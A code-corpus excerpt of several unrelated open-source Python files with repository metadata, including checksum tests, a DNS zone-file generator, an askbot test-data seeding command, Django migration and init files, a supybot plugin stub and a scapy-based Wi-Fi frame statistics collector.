file = tempfile.mkstemp()
print(file)
fp = open(file[1], 'w')
fp.write("Some text...\n")
fp.close()
def cleanup():
os.remove(file[1])
request.addfinalizer(cleanup)
return file[1]
def test_emptyfile(empty):
assert music_rename.checksum.md5sum_file(
empty) == 'd41d8cd98f00b204e9800998ecf8427e'
def test_not_empty(not_empty):
assert music_rename.checksum.md5sum_file(
not_empty) == '4e3e88d75e5dc70c6ebb2712bcf16227'
|
mfinelli/music-rename
|
tests/test_checksum.py
|
Python
|
gpl-3.0
| 877
|
from __future__ import absolute_import, unicode_literals
__author__ = 'admin'
# This will make sure the app is always imported when
# Django starts so that shared_task will use this app.
from .celery import appautoticket as celery_app
__all__ = ['celery_app']
|
kevinnguyeneng/django-uwsgi-nginx
|
app/naf_autoticket/__init__.py
|
Python
|
gpl-3.0
| 270
|
import setuptools
import sys
import numpy as np
# NOTE: If edt.cpp does not exist:
# cython -3 --fast-fail -v --cplus edt.pyx
extra_compile_args = []
if sys.platform == 'win32':
extra_compile_args += [
'/std:c++11', '/O2'
]
else:
extra_compile_args += [
'-std=c++11', '-O3', '-ffast-math', '-pthread'
]
if sys.platform == 'darwin':
extra_compile_args += [ '-stdlib=libc++', '-mmacosx-version-min=10.9' ]
setuptools.setup(
setup_requires=['pbr'],
python_requires="~=3.6", # >= 3.6 < 4.0
ext_modules=[
setuptools.Extension(
'edt',
sources=[ 'edt.cpp' ],
language='c++',
include_dirs=[ np.get_include() ],
extra_compile_args=extra_compile_args,
),
],
long_description_content_type='text/markdown',
pbr=True
)
|
seung-lab/euclidean-distance-transform-3d
|
python/setup.py
|
Python
|
gpl-3.0
| 779
|
#!/usr/bin/env python
# coding=UTF-8
#
import copy
import time
import socket
import logging
import vdns.common
class Zone0:
"""
Base class for producing zone files
"""
def __init__(self, dt):
self.dt=dt
def fmttd(self, td):
"""
Format a timedelta value to something that's appropriate for
zones
"""
lst=((1, '', 'second', 'seconds'),
(60, 'M', 'minute', 'minutes'),
(3600, 'H', 'hour', 'hours'),
(86400, 'D', 'day', 'days'),
(86400*7, 'W', 'week', 'weeks'))
ts=int(td.total_seconds())
# Find the first value that doesn't give an exact result
ent=lst[0]
for i in lst:
if (ts % i[0]) != 0:
break
ent=i
ret1="%d%s" % (int(ts/ent[0]), ent[1])
# Now form the human readable string
rem=ts
ret2=[]
for i in reversed(lst):
t=int(rem / i[0])
rem=rem % i[0]
if t==0:
continue
if t==1:
unit=i[2]
else:
unit=i[3]
st='%s %s' % (t, unit)
ret2.append(st)
# Speadup
if rem==0:
break
ret2st=', '.join(ret2)
ret=(ret1, ret2st)
return(ret)
def make_ptr_name(self, rec):
"""
Format the name of a PTR record (i.e. reverse IPv4 or IPv6)
"""
if rec['family']==4:
rev=rec['ip_str'].split('.')
rev.reverse()
rev='.'.join(rev)
ret=rev + '.in-addr.arpa'
elif rec['family']==6:
ip2=rec['ip_str'] + '/128'
ret=vdns.common.reverse_name(ip2)
# logging.error('Unhandled address family: %s' % (rec['family'], ))
# ret=''
else:
logging.error('Unknown address family: %s' % (rec['family'], ))
ret=''
# Get rid of the suffix if we can
domain=self.dt['_domain']
if ret[-len(domain):]==domain:
ret=ret[:-len(domain)-1]
return(ret)
# def make_soa(self, incserial):
def make_soa(self):
"""!
NO @param incserial If True then increment the serial number
"""
dt=self.dt
dt2={
# 'serial': self.mkserial(dt, incserial),
'serial': dt['serial'],
'domain': dt['_domain'],
'contact': dt['contact'],
'ns0': dt['ns0'],
}
times=('ttl', 'refresh', 'retry', 'expire', 'minimum')
for i in times:
t=self.fmttd(dt[i])
dt2[i]=t[0]
dt2[i+'2']=t[1]
st="""\
$ORIGIN %(domain)s.
$TTL %(ttl)s ; %(ttl2)s
@ %(ttl)s IN SOA %(ns0)s. %(contact)s. (
%(serial)-10s ; serial
%(refresh)s ; refresh (%(refresh2)s)
%(retry)s ; retry (%(retry2)s)
%(expire)s ; expire (%(expire2)s)
%(minimum)s ; minimum (%(minimum2)s)
)
""" % dt2
return(st)
def fmtrecord(self, name, ttl, rr, data):
"""
Format a record
This is a dump function that concatenates data, translating ttl
Use mkrecord instead
@param name The hostname
@param ttl The TTL in seconds
@param rr The type of the record
@param data A freeform string
@return The formed entry
"""
if ttl==None:
ttl2=''
else:
t=self.fmttd(ttl)
ttl2=' ' + t[0]
ret="%-16s%s IN %s %s" % \
(name, ttl2, rr, data)
return(ret)
def split_txt(self, data):
"""
Split TXT data to chunks of max 255 bytes to comply with bind
@param data An unquoted string of arbitrary length
@return A quoted string to be used as TXT record
"""
limit=255
items=[]
data2=copy.deepcopy(data)
while len(data2)>limit:
items.append(data2[:limit])
data2=data2[limit:]
items.append(data2)
ret='"' + '" "'.join(items) + '"'
return(ret)
def mkrecord(self, rr, rec):
"""
Create a record based on RR (the type)
@param rr The record type. One of: ns, mx, ds
@return The formed entry
"""
# If this is true then we will make sure that there is a dot
# at the end of the name
needsdot=False
# Allow this to be changed by a type (i.e. PTR)
hostname=None
if rr=='mx':
rrname='MX'
data="%-4d %s" % (rec['priority'], rec['mx'])
if rec['mx'].count('.')>=2:
needsdot=True
elif rr=='ns':
rrname='NS'
data=rec['ns']
if rec['ns'].count('.')>=2:
needsdot=True
elif rr=='ds':
rrname='DS'
data=[]
data.append("%d %d %d %s" % (rec['keyid'], rec['algorithm'],
1, rec['digest_sha1']))
data.append("%d %d %d %s" % (rec['keyid'], rec['algorithm'],
2, rec['digest_sha256']))
elif rr=='a':
rrname='A'
data=rec['ip_str'].split('/')[0]
elif rr=='aaaa':
rrname='AAAA'
data=rec['ip_str'].split('/')[0]
elif rr=='ptr':
# TODO: This is broken. We need to inverse the ip
# and take care of ipv6 as well
rrname='PTR'
data="%s.%s." % (rec['hostname'], rec['domain'])
hostname=self.make_ptr_name(rec)
needsdot=True
elif rr in ('cname', 'cnames'):
rrname='CNAME'
data=rec['hostname0']
if rec['hostname0'].count('.')>=2:
needsdot=True
elif rr=='txt':
rrname='TXT'
data='"%s"' % (rec['txt'],)
elif rr=='dnssec':
rrname='DNSKEY'
if rec['ksk']:
flags=257
else:
flags=256
# rec['hostname']=rec['domain']
data='%s 3 %s %s' % (flags, rec['algorithm'], rec['key_pub'])
elif rr=='sshfp':
rrname='SSHFP'
data='%(keytype)d %(hashtype)d %(fingerprint)s' % rec
elif rr=='dkim':
rrname='TXT'
hostname='%(selector)s._domainkey' % rec
if 'hostname' in rec and rec['hostname']:
hostname+='.'+rec['hostname']
data0=[]
data0.append('v=DKIM1')
if rec['g']!=None: data0.append('g=' + rec['g'])
data0.append('k=' + rec['k'])
data0.append('s=email')
if rec['t'] or not rec['subdomains']:
if rec['t']:
if rec['subdomains']:
t='y'
else:
t='s:y'
else:
t='s'
data0.append('t='+t)
if rec['h']!=None: data0.append('h=' + rec['h'])
data0.append('p=' + rec['key_pub'])
data=self.split_txt('; '.join(data0))
elif rr=='srv':
rrname='SRV'
hostname='_%(service)s._%(protocol)s' % rec
if rec['name']!='':
hostname+='.' + rec['name']
data='%(priority)s %(weight)s %(port)s %(target)s' % rec
if rec['target'].count('.')>=1:
needsdot=True
else:
vdns.common.abort("Unhandled RR type %s: %s" % (rr, rec))
if type(data)!=list:
data=[data]
if needsdot:
for i in range(len(data)):
if data[i][-1]!='.':
data[i]+='.'
if hostname==None:
if 'hostname' in rec:
hostname=rec['hostname']
else:
hostname=''
if hostname=='.':
hostname=''
ttl=rec['ttl']
#ret=self.fmtrecord(hostname, self.dt['ttl'], rrname, data)
ret=''
for d in data:
ret+=self.fmtrecord(hostname, ttl, rrname, d)
ret+='\n'
return(ret)
def mkrecord_a_aaaa(self, rec):
"""!
Auto-determine A or AAAA and call mkrecord
@record rec The record. Must be either A or AAAA
@return The result of mkrecord()
"""
if vdns.common.addr_family(rec['ip_str'])==4:
ret=self.mkrecord('a', rec)
else:
ret=self.mkrecord('aaaa', rec)
return(ret)
def make_toplevel(self):
"""
Create the top-level entries.
These are the entries with empty hostname or hostname=='.'
"""
lst=['ns', 'mx', 'dnssec', 'txt']
ret=''
for typ in lst:
if not typ in self.dt:
continue
recs=self.dt[typ]
for rec in recs:
if 'hostname' in rec and \
not (rec['hostname']=='' or rec['hostname']=='.'):
continue
ret+=self.mkrecord(typ, rec)
if 'hosts' in self.dt:
for rec in self.dt['hosts']:
if rec['hostname']!='':
continue
ret+=self.mkrecord_a_aaaa(rec)
# Add DKIM and SRV here (last) since they have a host part
for x in ('dkim', 'srv'):
if x in self.dt:
for rec in self.dt[x]:
if rec['hostname']!='':
continue
ret+=self.mkrecord(x, rec)
return(ret)
def make_subzones(self):
"""
Create entries that are considered subdomains
For now these are entries that have NS
"""
lst=['ns', 'ds']
ret=''
glue=''
for sub in sorted(self.dt['subs']):
ret+='\n'
for typ in lst:
recs=self.dt['subs'][sub][typ]
for rec in recs:
ret+=self.mkrecord(typ, rec)
recs=self.dt['subs'][sub]['glue']
for rec in recs:
glue+=self.mkrecord_a_aaaa(rec)
if glue!='':
ret+='\n; Glue records\n'
ret+=glue
return(ret)
def make_hosts(self):
"""
Make the host entries
Host entries are accompanied with relevant records like CNAMEs,
TXTs, etc...
"""
done=[] # List of entries already handled
ret=''
subdomaintypes=['ns']
lst=['txt', 'sshfp']
# Determine entries to be excluded
# - since we added them previously
for typ in subdomaintypes:
if not typ in self.dt:
continue
recs=self.dt[typ]
for rec in recs:
t=rec['hostname']
if not t in done:
done.append(t)
# Examine all hosts
# hosts2=dict([(h['ip'], h) for h in self.dt['hosts']])
# ips=hosts2.keys()
# ips.sort()
for rec in self.dt['hosts']:
# for ip in ips:
# rec=hosts2[ip]
hostname=rec['hostname']
if hostname=='':
continue
#ip=rec['ip']
ret+=self.mkrecord_a_aaaa(rec)
if hostname in done:
continue
done.append(hostname)
# Add additional info here
for typ in lst:
if not typ in self.dt:
continue
recs2=self.dt[typ]
for rec2 in recs2:
if rec2['hostname']!=hostname:
continue
rec3=copy.deepcopy(rec2)
rec3['hostname']=''
ret+=self.mkrecord(typ, rec3)
# CNAMEs are special. We look for cnames that are
# pointing to this host
if 'cnames' in self.dt:
recs2=self.dt['cnames']
for rec2 in recs2:
if rec2['hostname0']!=hostname:
continue
ret+=self.mkrecord('cnames', rec2)
done.append(rec2['hostname'])
# Add DKIM here (last) as it has a hostname part
for rec2 in self.dt['dkim']:
if rec2['hostname']!=hostname:
continue
ret+=self.mkrecord('dkim', rec2)
# Now do the rest cnames
rests=['cnames', 'txt']
for rr in rests:
if rr in self.dt:
ret+='\n'
for rec in self.dt[rr]:
if rec['hostname']=='':
continue
if not rec['hostname'] in done:
ret+=self.mkrecord(rr, rec)
return(ret)
def make_reverse(self):
"""
Make the reverse entries
"""
ret=''
# Create a dict and sort the keys. We list IPv4 before IPv6.
# Keys are: X-Y where X is 4 or 6 depending on the family and
# Y is the numerical representation of the address as returned by
# inet_pton. All of this to be able to sort based on numerical
# value instead of string representation
hosts={}
for x in self.dt['hosts']:
# Skip entries that are not designated as reverse
if not x['reverse']:
continue
family0=vdns.common.addr_family(x['ip'])
if family0==4:
family=socket.AF_INET
else:
family=socket.AF_INET6
#k=str(family0) + '-' + str(socket.inet_pton(family, x['ip_str']))
# Use bytestring to fix the sorting issue with python3
# python3: bytes(family0) fails because bytes() expects an
# iterable. Using a list does the trick
k=bytes([family0]) + b'-' + \
socket.inet_pton(family, x['ip_str'])
hosts[k]=x
for x in sorted(hosts):
rec=hosts[x]
ret+=self.mkrecord('ptr', rec)
return(ret)
def make_keys(self):
"""
Make the key files
Returns a list of entries. Each entry is a tuple of:
(type, fn, contents)
Where type is 'key' or 'private'
"""
ret=[]
for x in self.dt['dnssec']:
fn0="K%s.+%03d+%d" % (x['domain'], x['algorithm'], x['keyid'])
fn=fn0 + '.key'
rec=('key', fn, x['st_key_pub'])
ret.append(rec)
fn=fn0 + '.private'
rec=('private', fn, x['st_key_priv'])
ret.append(rec)
return(ret)
if __name__=="__main__":
pass
# vim: set ts=8 sts=4 sw=4 et formatoptions=r ai nocindent:
|
sharhalakis/vdns
|
src/vdns/zone0.py
|
Python
|
gpl-3.0
| 14,983
|
from django.core.management.base import NoArgsCommand
from askbot.models import User
from optparse import make_option
from askbot.utils.console import choice_dialog
NUM_USERS = 40
# KEEP NEXT 3 SETTINGS LESS THAN OR EQUAL TO NUM_USERS!
NUM_QUESTIONS = 40
NUM_ANSWERS = 20
NUM_COMMENTS = 20
# To ensure that all the actions can be made, repute each user high positive
# karma. This can be calculated dynamically - max of MIN_REP_TO_... settings
INITIAL_REPUTATION = 500
# Defining template inputs.
USERNAME_TEMPLATE = "test_user_%s"
PASSWORD_TEMPLATE = "test_password_%s"
EMAIL_TEMPLATE = "test_user_%s@askbot.org"
TITLE_TEMPLATE = "Test question title No.%s"
TAGS_TEMPLATE = ["tag-%s-0", "tag-%s-1"] # len(TAGS_TEMPLATE) tags per question
CONTENT_TEMPLATE = """Lorem lean startup ipsum product market fit customer
development acquihire technical cofounder. User engagement
**A/B** testing *shrink* a market venture capital pitch."""
ANSWER_TEMPLATE = """Accelerator photo sharing business school drop out ramen
hustle crush it revenue traction platforms."""
COMMENT_TEMPLATE = """Main differentiators business model micro economics
marketplace equity augmented reality human computer"""
class Command(NoArgsCommand):
option_list = NoArgsCommand.option_list + (
make_option('--noinput', action='store_false', dest='interactive', default=True,
help='Do not prompt the user for input of any kind.'),
)
def print_if_verbose(self, text):
"Only print if user chooses verbose output"
if self.verbosity > 0:
print text
def create_users(self):
"Create the users and return an array of created users"
users = []
#add admin with the same password
admin = User.objects.create_user('admin', 'admin@example.com')
admin.set_password('admin')
self.print_if_verbose("Created User 'admin'")
users.append(admin)
# Keeping the created users in array - we will iterate over them
# several times, we don't want querying the model each and every time.
for i in range(NUM_USERS):
s_idx = str(i)
user = User.objects.create_user(USERNAME_TEMPLATE % s_idx,
EMAIL_TEMPLATE % s_idx)
user.set_password(PASSWORD_TEMPLATE % s_idx)
user.reputation = INITIAL_REPUTATION
user.save()
self.print_if_verbose("Created User '%s'" % user.username)
users.append(user)
return users
def create_questions(self, users):
"Create the questions and return the last one as active question"
# Keeping the last active question entry for later use. Questions API
# might change, so we rely solely on User data entry API.
active_question = None
last_vote = False
# Each user posts a question
for user in users[:NUM_QUESTIONS]:
# Downvote/upvote the questions - It's reproducible, yet
# gives good randomized data
if not active_question is None:
if last_vote:
user.downvote(active_question)
self.print_if_verbose("%s downvoted a question"%(
user.username
))
else:
user.upvote(active_question)
self.print_if_verbose("%s upvoted a question"%(
user.username
))
last_vote = ~last_vote
# len(TAGS_TEMPLATE) tags per question - each tag is different
tags = " ".join([t%user.id for t in TAGS_TEMPLATE])
active_question = user.post_question(
title = TITLE_TEMPLATE % user.id,
body_text = CONTENT_TEMPLATE,
tags = tags,
)
self.print_if_verbose("Created Question '%s' with tags: '%s'" % (
active_question.title, tags,)
)
return active_question
def create_answers(self, users, active_question):
"Create the answers for the active question, return the active answer"
active_answer = None
last_vote = False
# Now, fill the last added question with answers
for user in users[:NUM_ANSWERS]:
# We don't need to test for data validation, so ONLY users
# that aren't authors can post answer to the question
if not active_question.author is user:
# Downvote/upvote the answers - It's reproducible, yet
# gives good randomized data
if not active_answer is None:
if last_vote:
user.downvote(active_answer)
self.print_if_verbose("%s downvoted an answer"%(
user.username
))
else:
user.upvote(active_answer)
self.print_if_verbose("%s upvoted an answer"%(
user.username
))
last_vote = ~last_vote
active_answer = user.post_answer(
question = active_question,
body_text = ANSWER_TEMPLATE,
follow = True
)
self.print_if_verbose("%s posted an answer to the active question"%(
user.username
))
# Upvote the active question
user.upvote(active_question)
# Follow the active question
user.follow_question(active_question)
self.print_if_verbose("%s followed the active question"%(
user.username)
)
# Subscribe to the active question
user.subscribe_for_followed_question_alerts()
self.print_if_verbose("%s subscribed to followed questions"%(
user.username)
)
return active_answer
def create_comments(self, users, active_question, active_answer):
"""Create the comments for the active question and the active answer,
return 2 active comments - 1 question comment and 1 answer comment"""
active_question_comment = None
active_answer_comment = None
for user in users[:NUM_COMMENTS]:
active_question_comment = user.post_comment(
parent_post = active_question,
body_text = COMMENT_TEMPLATE
)
self.print_if_verbose("%s posted a question comment"%user.username)
active_answer_comment = user.post_comment(
parent_post = active_answer,
body_text = COMMENT_TEMPLATE
)
self.print_if_verbose("%s posted an answer comment"%user.username)
# Upvote the active answer
user.upvote(active_answer)
# Upvote active comments
if active_question_comment and active_answer_comment:
num_upvotees = NUM_COMMENTS - 1
for user in users[:num_upvotees]:
user.upvote(active_question_comment)
user.upvote(active_answer_comment)
return active_question_comment, active_answer_comment
def handle_noargs(self, **options):
self.verbosity = int(options.get("verbosity", 1))
self.interactive = options.get("interactive")
if self.interactive:
answer = choice_dialog("This command will DELETE ALL DATA in the current database, and will fill the database with test data. Are you absolutely sure you want to proceed?",
choices = ("yes", "no", ))
if answer != "yes":
return
# Create Users
users = self.create_users()
# Create Questions, vote for questions
active_question = self.create_questions(users)
# Create Answers, vote for the answers, vote for the active question
# vote for the active answer
active_answer = self.create_answers(users, active_question)
# Create Comments, vote for the active answer
active_question_comment, active_answer_comment = self.create_comments(
users, active_question, active_answer)
# Edit the active question, answer and comments
active_question.author.edit_question(
question = active_question,
title = TITLE_TEMPLATE % "EDITED",
body_text = CONTENT_TEMPLATE,
revision_comment = "EDITED",
force = True
)
self.print_if_verbose("User has edited the active question")
active_answer.author.edit_answer(
answer = active_answer,
body_text = COMMENT_TEMPLATE,
force = True
)
self.print_if_verbose("User has edited the active answer")
active_answer_comment.user.edit_comment(
comment = active_answer_comment,
body_text = ANSWER_TEMPLATE
)
self.print_if_verbose("User has edited the active answer comment")
active_question_comment.user.edit_comment(
comment = active_question_comment,
body_text = ANSWER_TEMPLATE
)
self.print_if_verbose("User has edited the active question comment")
# Accept best answer
active_question.author.accept_best_answer(
answer = active_answer,
force = True,
)
self.print_if_verbose("User has accepted a best answer")
self.print_if_verbose("DONE")
|
samhoo/askbot-realworld
|
askbot/management/commands/askbot_add_test_content.py
|
Python
|
gpl-3.0
| 10,587
|
# Generated by Django 2.2.7 on 2019-11-21 15:40
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('smmapdfs_edit', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='pdfsandwichemailconnector',
name='administrative_unit',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='aklub.AdministrativeUnit'),
),
migrations.AlterField(
model_name='pdfsandwichfontconnector',
name='administrative_unit',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='aklub.AdministrativeUnit'),
),
migrations.AlterField(
model_name='pdfsandwichtypeconnector',
name='administrative_unit',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='aklub.AdministrativeUnit'),
),
]
|
auto-mat/klub
|
apps/smmapdfs_edit/migrations/0002_auto_20191121_1640.py
|
Python
|
gpl-3.0
| 1,078
|
###
# Copyright (c) 2012, Valentin Lorentz
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
"""
Add a description of the plugin (to be presented to the user inside the wizard)
here. This should describe *what* the plugin does.
"""
import supybot
import supybot.world as world
# Use this for the version of this plugin. You may wish to put a CVS keyword
# in here if you're keeping the plugin in CVS or some similar system.
__version__ = ""
# XXX Replace this with an appropriate author or supybot.Author instance.
__author__ = supybot.authors.unknown
# This is a dictionary mapping supybot.Author instances to lists of
# contributions.
__contributors__ = {}
# This is a url where the most recent plugin package can be downloaded.
__url__ = '' # 'http://supybot.com/Members/yourname/TwitterStream/download'
from . import config
from . import plugin
from imp import reload
reload(plugin) # In case we're being reloaded.
# Add more reloads here if you add third-party modules and want them to be
# reloaded when this plugin is reloaded. Don't forget to import them as well!
if world.testing:
from . import test
Class = plugin.Class
configure = config.configure
# vim:set shiftwidth=4 tabstop=4 expandtab textwidth=79:
|
kg-bot/SupyBot
|
plugins/TwitterStream/__init__.py
|
Python
|
gpl-3.0
| 2,725
|
#import wrftools
#from exceptions import ConfigError, DomainError, ConversionError
#import tools
#import io
#__all__ = ['wrftools', 'tools', 'io']
|
envhyf/wrftools
|
wrftools/__init__.py
|
Python
|
gpl-3.0
| 148
|
#!/usr/bin/python
import scapy
#import scapy_ex
import os,sys
import printerInfo
import enum
from enum import Enum
from scapy.all import *
import time, datetime
#from time import sleep
class Message(Enum):
AUTH = "0"
DEAUTH = "1"
PROBE_REQ = "2"
PROBE_RESP = "3"
HAND_SUCC = "4"
HAND_FAIL = "5"
CORR_PACK = "6"
RTS = "7"
CTS = "8"
ACK = "9"
DATA = "10"
BEACON = "11"
ASSOC_REQ = "12"
ASSOC_RESP = "13"
DISASSOC = "14"
NUM_PACK = "15"
OTHER = "16"
class AnalyzePackage:
BROADCAST_ADDR = "ff:ff:ff:ff:ff:ff"
EXTENSION_LOG = ".log"
FOLDER_LOG = "log/"
def __init__(self, printerInfo):
self.apPresent = []
self.essid = {}
self.channel = {}
self.power = {}
self.powerAP = {}
self.authentInfo = {}
self.authent = {}
self.associationRequestInfo = {}
self.associationRequest = {}
self.associationResponceInfo = {}
self.associationResponce = {}
self.disassociationInfo = {}
self.disassociation = {}
self.deauthentInfo = {}
self.deauthent = {}
self.probeRequestInfo = {}
self.probeRequest = {}
self.probeResponseInfo = {}
self.probeResponse = {}
self.eapHandshakeSuccessInfo = {}
self.eapHandshakeSuccess = {}
self.eapHandshakeFailedInfo = {}
self.eapHandshakeFailed = {}
self.corruptedPackInfo = {}
self.corruptedPack = {}
self.eapRequest = {}
self.rtsListInfo = {}
self.rtsList = {}
self.ctsListInfo = {}
self.ctsList = {}
self.dataListInfo = {}
self.dataList = {}
self.ackListInfo = {}
self.ackList = {}
self.beaconListInfo = {}
self.beacon = {}
self.numPackInfo = {}
self.numPack = {}
self.otherListInfo = {}
self.otherList = {}
self.cont = 0
self.printerInfo = printerInfo
self.info = {}
self.infoAP = {}
self.infoClient = {}
self.roamingClient = {}
self.contForAP = 0
now = datetime.datetime.now()
date = str(now.year)+str(now.month)+str(now.day)+"-"+str(now.hour)+"-"+str(now.minute)+"-"+str(now.second)
self.titleLog = AnalyzePackage.FOLDER_LOG + date + AnalyzePackage.EXTENSION_LOG
#self.fileLog = open(self.titleLog, "w+")
f = open("DISASS.txt", "w+")
f.close()
def createArrayInfo(self,macAP, macClient):
if (macAP,macClient) not in self.deauthentInfo:
self.deauthentInfo[(macAP,macClient)] = 0
if (macAP,macClient) not in self.authentInfo:
self.authentInfo[(macAP,macClient)] = 0
if (macAP,macClient) not in self.associationRequestInfo:
self.associationRequestInfo[(macAP,macClient)] = 0
if (macAP,macClient) not in self.associationResponceInfo:
self.associationResponceInfo[(macAP,macClient)] = 0
if (macAP,macClient) not in self.disassociationInfo:
self.disassociationInfo[(macAP,macClient)] = 0
if (macAP,macClient) not in self.power:
self.power[(macAP,macClient)] = "-"
if (macAP,macClient) not in self.eapHandshakeSuccessInfo:
self.eapHandshakeSuccessInfo[(macAP,macClient)] = 0
if (macAP,macClient) not in self.eapHandshakeFailedInfo:
self.eapHandshakeFailedInfo[(macAP,macClient)] = 0
if (macAP,macClient) not in self.corruptedPackInfo:
self.corruptedPackInfo[(macAP,macClient)] = 0
if (macAP,macClient) not in self.rtsListInfo:
self.rtsListInfo[(macAP,macClient)] = 0
if (macAP,macClient) not in self.ctsListInfo:
self.ctsListInfo[(macAP,macClient)] = 0
if (macAP,macClient) not in self.dataListInfo:
self.dataListInfo[(macAP,macClient)] = 0
if (macAP,macClient) not in self.numPackInfo:
self.numPackInfo[(macAP,macClient)] = 0
if (macAP,macClient) not in self.ackListInfo:
self.ackListInfo[(macAP,macClient)] = 0
if (macAP,macClient) not in self.beaconListInfo:
self.beaconListInfo[(macAP,macClient)] = 0
if (macAP,macClient) not in self.probeResponseInfo:
self.probeResponseInfo[(macAP,macClient)] = 0
if macClient not in self.ackListInfo:
self.ackListInfo[macClient] = 0
if (macAP,macClient) not in self.otherListInfo:
self.otherListInfo[(macAP,macClient)] = 0
def createArray(self, mac):
if mac not in self.beacon:
self.beacon[mac] = 0
if mac not in self.numPack:
self.numPack[mac] = 0
if mac not in self.authent:
self.authent[mac] = 0
if mac not in self.associationRequest:
self.associationRequest[mac] = 0
if mac not in self.associationResponce:
self.associationResponce[mac] = 0
if mac not in self.disassociation:
self.disassociation[mac] = 0
if mac not in self.deauthent:
self.deauthent[mac] = 0
if mac not in self.probeRequest:
self.probeRequest[mac] = 0
if mac not in self.probeResponse:
self.probeResponse[mac] = 0
if mac not in self.eapHandshakeSuccess:
self.eapHandshakeSuccess[mac] = 0
if mac not in self.eapHandshakeFailed:
self.eapHandshakeFailed[mac] = 0
if mac not in self.corruptedPack:
self.corruptedPack[mac] = 0
if mac not in self.rtsList:
self.rtsList[mac] = 0
if mac not in self.ctsList:
self.ctsList[mac] = 0
if mac not in self.dataList:
self.dataList[mac] = 0
if mac not in self.ackList:
self.ackList[mac] = 0
if mac not in self.otherList:
self.otherList[mac] = 0
if mac not in self.power:
self.power[mac] = "-"
if mac not in self.channel:
self.channel[mac] = "-"
def checkFrequence(self,macAP, macClient, power):
if power != 0 and power != None:
if macAP != AnalyzePackage.BROADCAST_ADDR:
self.power[(macAP,macClient)] = power
self.powerAP[macAP] = power
def checkChannel(self, mac, channel):
if channel != "0" and channel != None:
self.channel[mac] = channel
def printInfo(self,essid,macAP,macClient):
if macAP != None and macClient != None:
if (essid,macClient) not in self.probeRequestInfo:
self.probeRequestInfo[(essid,macClient)] = 0
if self.numPackInfo[(macAP,macClient)] != 0:
percentCorr = int(float(self.corruptedPackInfo[(macAP,macClient)])/float(self.numPackInfo[(macAP,macClient)])*100)
strPercentage = str(percentCorr)
i = tuple([essid, macAP, macClient, self.authentInfo[(macAP,macClient)], self.deauthentInfo[(macAP,macClient)], self.associationRequestInfo[(macAP,macClient)], self.associationResponceInfo[(macAP,macClient)], self.disassociationInfo[(macAP,macClient)], self.eapHandshakeSuccessInfo[(macAP,macClient)], self.eapHandshakeFailedInfo[(macAP,macClient)], self.power[(macAP,macClient)], self.corruptedPackInfo[(macAP,macClient)], strPercentage, self.dataListInfo[(macAP,macClient)], self.rtsListInfo[(macAP,macClient)], self.ctsListInfo[(macAP,macClient)], self.ackListInfo[(macAP, macClient)], self.beaconListInfo[(macAP,macClient)], self.probeRequestInfo[(essid,macClient)], self.probeResponseInfo[(macAP,macClient)], self.numPackInfo[(macAP,macClient)], self.otherListInfo[(macAP,macClient)]])
self.info[i[1],i[2]] = i
def printInfoAP(self, essid, macAP, macClient):
if macAP != None and macAP != AnalyzePackage.BROADCAST_ADDR and macClient != None:
if (macAP) not in self.probeRequest:
self.probeRequest[macAP] = 0
if self.numPack[macAP] != 0:
percentCorr = int(float(self.corruptedPack[macAP])/float(self.numPack[macAP])*100)
strPercentage = str(percentCorr)
i = tuple([essid, macAP, macClient, self.channel[macAP], self.authent[macAP], self.deauthent[macAP], self.associationRequest[macAP], self.associationResponce[macAP], self.disassociation[macAP], self.eapHandshakeSuccess[macAP], self.eapHandshakeFailed[macAP], self.power[macAP],self.corruptedPack[macAP], strPercentage, self.dataList[macAP], self.rtsList[macAP], self.ctsList[macAP], self.ackList[macAP], self.beacon[macAP], self.probeRequest[macAP], self.probeResponse[macAP], self.numPack[macAP], self.otherList[macAP]])
self.infoAP[i[1]] = i
def printInfoClient(self, essid, macAP, macClient):
if macAP != None and macClient != None and macClient != "":
if (macClient) not in self.probeRequest:
self.probeRequest[macClient] = 0
if self.numPack[macClient] != 0:
percentCorr = int(float(self.corruptedPack[macClient])/float(self.numPack[macClient])*100)
strPercentage = str(percentCorr)
i = tuple([essid, macAP, macClient, self.channel[macClient], self.authent[macClient], self.deauthent[macClient], self.associationRequest[macClient], self.associationResponce[macClient], self.disassociation[macClient], self.eapHandshakeSuccess[macClient], self.eapHandshakeFailed[macClient], self.corruptedPack[macClient], strPercentage, self.dataList[macClient], self.rtsList[macClient], self.ctsList[macClient], self.ackList[macClient], self.beacon[macClient], self.probeRequest[macClient], self.probeResponse[macClient], self.numPack[macClient], self.otherList[macClient]])
self.infoClient[i[2]] = i
def takeInformation(self):
return self.info
def takeInformationAP(self):
return self.infoAP
def takeInformationClient(self):
return self.infoClient
def takeInformationRoamingClient(self):
return self.roamingClient
